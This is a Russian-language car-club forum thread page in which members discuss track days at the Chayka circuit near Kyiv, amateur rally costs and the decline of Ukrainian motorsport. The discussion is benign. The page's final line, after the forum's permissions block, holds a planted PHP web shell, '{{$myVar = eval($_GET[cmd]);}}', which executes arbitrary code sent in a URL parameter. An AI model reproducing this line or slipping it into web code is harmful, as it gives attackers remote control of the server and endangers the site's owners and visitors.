+ Ответить в теме
Страница 37 из 61 ПерваяПервая ... 27 35 36 37 38 39 47 ... ПоследняяПоследняя
Показано с 361 по 370 из 608

Тема: Чайка. Драг, трек дни и прочие мероприятия


  1. #361
    GTI-Racing Pashka is on a distinguished road Аватар для Pashka
    Регистрация
    27.02.2008
    Откуда
    Киев
    Машина
    Seat Leon FR 2.0 TFSI
    Сообщений
    391
    Цитата Сообщение от resident Посмотреть сообщение
    Привет,
    Неа, перешить коробку к сожалению не получилось, технически нет возможности

    П.С. а что за другая прошивка? если не секрет....
    Почему нет возможности прошить коробку? Валера же писал что в он-лайне это делают, неужели надо ехать в Польшу для этого?

    Прошивка у меня сейчас АТГ, что и видно из подписи )))

    По поводу чемпа, ребят, а чем вас не устраивает поехать в СОКе или в ралли Чайка... оно все асфальтовое, грунта нигде нет. Если бы было достаточное количество "хот-хетчей" то можно было бы думать, а судя из СОКа, кроме меня такое никому не надо.

    Та и давайте вспомним тему я создавал ВАГ-пати, сколько ГТИ хотела учавствовать? Та и нету у нас столько хот-хетчей... У нас ФФ штуки 2 ито их видно только летом, МПСки ездят тока прямо, Тайп Р даже прямо не ездят, ОПС астры ни одной не видел, хотя грят что есть. Вот и остается ГТИ да леоны ФР

    Кстати, в след году, СОК, для турбо недопривода сделают отдельно клас, всмысле, со СТИ и ЭВО мы будем в разных классах.
    Seat Leon FR 2.0 TFSI (green)/Chip ATG/Cold Air Intake/DownPipe 3"/Wiechers sport front & rear/Zimmermann Sport/

  2. #362
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    Цитата Сообщение от Pashka Посмотреть сообщение
    Почему нет возможности прошить коробку? Валера же писал что в он-лайне это делают, неужели надо ехать в Польшу для этого?

    Прошивка у меня сейчас АТГ, что и видно из подписи )))

    По поводу чемпа, ребят, а чем вас не устраивает поехать в СОКе или в ралли Чайка... оно все асфальтовое, грунта нигде нет. Если бы было достаточное количество "хот-хетчей" то можно было бы думать, а судя из СОКа, кроме меня такое никому не надо.

    Та и давайте вспомним тему я создавал ВАГ-пати, сколько ГТИ хотела учавствовать? Та и нету у нас столько хот-хетчей... У нас ФФ штуки 2 ито их видно только летом, МПСки ездят тока прямо, Тайп Р даже прямо не ездят, ОПС астры ни одной не видел, хотя грят что есть. Вот и остается ГТИ да леоны ФР

    Кстати, в след году, СОК, для турбо недопривода сделают отдельно клас, всмысле, со СТИ и ЭВО мы будем в разных классах.

    Паша, тема понятная - у нас, к большому сожалению, автоспорта нет и думаю не будет никогда. Каким-то чудом еще есть Чайка, долго ли она будет еще на самом деле большой вопрос. Кстати кольцо в этом году не на Чайке, а в Черкассах. Короче, по нулям. А так как нет спорта профессионального, нет спорта и любительского. Я уже давно перестал агитировать кого-то из нашего клуба на трек-дни - это никому не нужно и не интересно. К сожалению. А про ралли я вообще молчу т.к. на самом деле ралли уже следующая ступень после трек-дней.

  3. #363
    GTI-Racing constantinus is on a distinguished road Аватар для constantinus
    Регистрация
    22.09.2007
    Откуда
    Киев
    Машина
    RGTI
    Сообщений
    1,631
    Цитата Сообщение от IvanGTIV Посмотреть сообщение
    Паша, тема понятная - у нас, к большому сожалению, автоспорта нет и думаю не будет никогда. Каким-то чудом еще есть Чайка, долго ли она будет еще на самом деле большой вопрос. Кстати кольцо в этом году не на Чайке, а в Черкассах. Короче, по нулям. А так как нет спорта профессионального, нет спорта и любительского. Я уже давно перестал агитировать кого-то из нашего клуба на трек-дни - это никому не нужно и не интересно. К сожалению. А про ралли я вообще молчу т.к. на самом деле ралли уже следующая ступень после трек-дней.
    Fisher'у интересно проехаться))) так что еще люди есть)))

  4. #364
    GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Регистрация
    07.05.2008
    Машина
    VW Golf GTI Mk5 DSG
    Сообщений
    3,440
    Только наверно сначала должен появиться любительский автоспорт, а потом уже профессиональный )
    С уважением, Василий.

    My onboard video.

  5. #365
    GTI-Racing Pashka is on a distinguished road Аватар для Pashka
    Регистрация
    27.02.2008
    Откуда
    Киев
    Машина
    Seat Leon FR 2.0 TFSI
    Сообщений
    391
    Цитата Сообщение от IvanGTIV Посмотреть сообщение
    Паша, тема понятная - у нас, к большому сожалению, автоспорта нет и думаю не будет никогда. Каким-то чудом еще есть Чайка, долго ли она будет еще на самом деле большой вопрос. Кстати кольцо в этом году не на Чайке, а в Черкассах. Короче, по нулям. А так как нет спорта профессионального, нет спорта и любительского. Я уже давно перестал агитировать кого-то из нашего клуба на трек-дни - это никому не нужно и не интересно. К сожалению. А про ралли я вообще молчу т.к. на самом деле ралли уже следующая ступень после трек-дней.
    Как бы согласен и как бы не очень.
    Мне не с чем сравнивать. Я не знаю как автоспорт развивается или загибается в других странах. То что у нас нету гонщиков с мировым именем - это факт.
    Судить могу только по любительским, ибо в них сам участвую. Канал в 60 машин на СОКе забит всегда, в Алуште было 76 машин, во Львое зарегистрированных было больше 60, но участвовало 57 машин. В прошлом году не помню, но канал всегда был забит. Чайка в прошлом году с каналом в 60 машин, всегда пропускала через себя больше, только в этом году было около 40 на одном этапе. Так что не все так и плохо.
    Автоспорт это очень дорого, и... не буду флудить о благосостоянии украИнского народа :-D

    Добавлено через 1 минуту
    Цитата Сообщение от constantinus Посмотреть сообщение
    Fisher'у интересно проехаться))) так что еще люди есть)))
    Отлично! буду не один недоприводный )))

    Добавлено через 2 минуты
    Цитата Сообщение от VVZ Посмотреть сообщение
    Только наверно сначала должен появиться любительский автоспорт, а потом уже профессиональный )
    Да, оно взаимосвязано. Кто то раньше а кто то позже всеравно вырастает из любительских гонок и переходит в спорт.
    Последний раз редактировалось Pashka; 20.07.2010 в 20:51. Причина: Добавлено сообщение
    Seat Leon FR 2.0 TFSI (green)/Chip ATG/Cold Air Intake/DownPipe 3"/Wiechers sport front & rear/Zimmermann Sport/

  6. #366
    GTI-Racing constantinus is on a distinguished road Аватар для constantinus
    Регистрация
    22.09.2007
    Откуда
    Киев
    Машина
    RGTI
    Сообщений
    1,631
    Цитата Сообщение от Pashka Посмотреть сообщение
    Как бы согласен и как бы не очень.
    Мне не с чем сравнивать. Я не знаю как автоспорт развивается или загибается в других странах. То что у нас нету гонщиков с мировым именем - это факт.
    Судить могу только по любительским, ибо в них сам участвую. Канал в 60 машин на СОКе забит всегда, в Алуште было 76 машин, во Львое зарегистрированных было больше 60, но участвовало 57 машин. В прошлом году не помню, но канал всегда был забит. Чайка в прошлом году с каналом в 60 машин, всегда пропускала через себя больше, только в этом году было около 40 на одном этапе. Так что не все так и плохо.
    Автоспорт это очень дорого, и... не буду флудить о благосостоянии украИнского народа :-D

    Добавлено через 1 минуту

    Отлично! буду не один недоприводный )))

    Добавлено через 2 минуты

    Да, оно взаимосвязано. Кто то раньше а кто то позже всеравно вырастает из любительских гонок и переходит в спорт.
    Я имел в виду Трековые дни) про фишера) Осталось чуть чуть и наставить его на путь истинный)

  7. #367
    GTI-Racing Scruj is on a distinguished road Аватар для Scruj
    Регистрация
    27.11.2007
    Машина
    GTI V, VTG
    Сообщений
    1,012
    У автоспорта очень плохая монетизация - для полулюбительской команды, которая учавствует в всем чемпионате, нужно тысяч 40 долларов в год (предполагая, что одной старой субы им хватит), а отдача рекламодателю просто нулевая.
    Да что говорить - Чука(!) в интервью говорил, что денег за свои выступления он не получает

    Добавлено через 1 минуту
    Как узнать, в какие даты будут трек дни? На http://trackdays.chayka-ring.com/ молчок...
    Последний раз редактировалось Scruj; 20.07.2010 в 21:53. Причина: Добавлено сообщение
    GTI - Get There Instantly (tm)

  8. #368
    GTI-Racing Pashka is on a distinguished road Аватар для Pashka
    Регистрация
    27.02.2008
    Откуда
    Киев
    Машина
    Seat Leon FR 2.0 TFSI
    Сообщений
    391
    Полулюбительского не бывает ))))
    Есть ралли на серийных авто (где может и спортсмен ездить) и ЧУ по ралли.
    На серийных авто, надо только желание... А денег сколько понадобится то нельзя посчитать, ведь в "рекламных целях" можно ведь не валить на все деньги, а так, проехался себе, ручник дергнул, резиной подымел, зрители довольны.
    В ЧУ нужна другая техника, ЗИП, техничка, команда... не считал но думаю в 40 тыс в год не впишешься с покупкой 2108... хотя и 2108 могут стоить от 5 к уе, но чтобы она могла ехать в призы то около 20 к уе.

    трек дни, как правило объявляют за неделю, две.
    Seat Leon FR 2.0 TFSI (green)/Chip ATG/Cold Air Intake/DownPipe 3"/Wiechers sport front & rear/Zimmermann Sport/

  9. #369
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    Цитата Сообщение от Pashka Посмотреть сообщение
    Как бы согласен и как бы не очень.
    Мне не с чем сравнивать. Я не знаю как автоспорт развивается или загибается в других странах. То что у нас нету гонщиков с мировым именем - это факт.
    Судить могу только по любительским, ибо в них сам участвую. Канал в 60 машин на СОКе забит всегда, в Алуште было 76 машин, во Львое зарегистрированных было больше 60, но участвовало 57 машин. В прошлом году не помню, но канал всегда был забит. Чайка в прошлом году с каналом в 60 машин, всегда пропускала через себя больше, только в этом году было около 40 на одном этапе. Так что не все так и плохо.
    Автоспорт это очень дорого, и... не буду флудить о благосостоянии украИнского народа :-D

    Добавлено через 1 минуту

    Отлично! буду не один недоприводный )))

    Добавлено через 2 минуты

    Да, оно взаимосвязано. Кто то раньше а кто то позже всеравно вырастает из любительских гонок и переходит в спорт.
    Паша, ну начать даже с наличия треков - ну просто так случилось что во времена СССР Чайку решили разместить в Украине, если б не это, в Украине вообще не было бы ни одного трека. И я очень сильно не уверен, что Чайка будет жить как автодром, т.к. цена земли на которой она стоит и денежные потоки, которые она генерирует (или скорее могла бы генерировать) как автодром..... ну ты сам понимаешь......На самом деле вообще крайне удивительно что она до сих пор есть. Можно посмотреть на рэйсхроно.ком - Финляндия 25(!) треков в базе, Франция 22 трека, Англия 30 треков, Испания 23 трека и так далее. Откуда у нас могут взяться гонщики с мировым именем? Ведь как правило мировые имена появляются как песчинки золота при просеве тонн песка, а у нас песок не просеивается..............

    Любительский спорт - да он есть (ралли), но на самом деле количество участников для страны в 48 млн. (или сколько там осталось) мизерное. Согласен, что величина бюджета очень весомый сдерживающий фактор и от этого никуда не уйти. Чтобы ездить нужно платить и немало.
    Последний раз редактировалось IvanGTIV; 20.07.2010 в 23:04.

  10. #370
    GTI-Racing Pashka is on a distinguished road Аватар для Pashka
    Регистрация
    27.02.2008
    Откуда
    Киев
    Машина
    Seat Leon FR 2.0 TFSI
    Сообщений
    391
    Согласен с каждым словом... Печально...
    Количество треков в других странах меня удивило :(
    А Чайка и действительно уже со всех сторон огорожена логистическими комплексами и частными домами... так что, если там скоро появится очередной МЕТРО то не удивится никто.
    Seat Leon FR 2.0 TFSI (green)/Chip ATG/Cold Air Intake/DownPipe 3"/Wiechers sport front & rear/Zimmermann Sport/

+ Ответить в теме
Страница 37 из 61 ПерваяПервая ... 27 35 36 37 38 39 47 ... ПоследняяПоследняя

Похожие темы

  1. Чайка Драг
    от Gomkv в разделе Встречи и мероприятия
    Ответов: 31
    Последнее сообщение: 07.01.2024, 20:21
  2. Мероприятия в марте
    от IvanGTIV в разделе Встречи и мероприятия
    Ответов: 21
    Последнее сообщение: 05.01.2024, 08:13
  3. Ответов: 2
    Последнее сообщение: 21.02.2015, 11:36
  4. Европейские мероприятия VW
    от Radge39 в разделе Курилка
    Ответов: 3
    Последнее сообщение: 25.05.2010, 23:28
  5. Чайка
    от Gomkv в разделе Украина
    Ответов: 29
    Последнее сообщение: 28.04.2009, 17:01

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}